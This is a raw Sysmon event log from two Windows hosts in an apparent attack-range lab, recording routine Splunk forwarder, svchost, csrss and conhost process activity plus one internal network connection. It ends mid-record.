12:27:31.179{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.179{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E5B3-63C7-7406-00000000AF02}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.179{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5B3-63C7-7406-00000000AF02}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:31.182{FE4C2B44-E5B3-63C7-7406-00000000AF02}2228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018052Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5B4-63C7-2C02-00000000B002}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018051Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E5B4-63C7-2C02-00000000B002}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018050Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018049Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018048Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018047Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018046Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018045Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018044Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018043Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018042Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5B4-63C7-2C02-00000000B002}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018041Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018040Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.943{E5A8D418-E5B4-63C7-2C02-00000000B002}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018039Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:32.940{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA1F8752FE60B897F9A23A359BF2E437,SHA256=E886FAD3659402E19042E23170B0AEAC7702EE5C7E8CE0E3E056075F962F5BCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.518{FE4C2B44-E5B4-63C7-7506-00000000AF02}55084188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000045640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:29.520{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56433-false10.0.1.12-8000- 10341000x800000000000000045639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.378{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5B4-63C7-7506-00000000AF02}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.378{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E5B4-63C7-7506-00000000AF02}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.378{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5B4-63C7-7506-00000000AF02}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.379{FE4C2B44-E5B4-63C7-7506-00000000AF02}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:32.169{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program 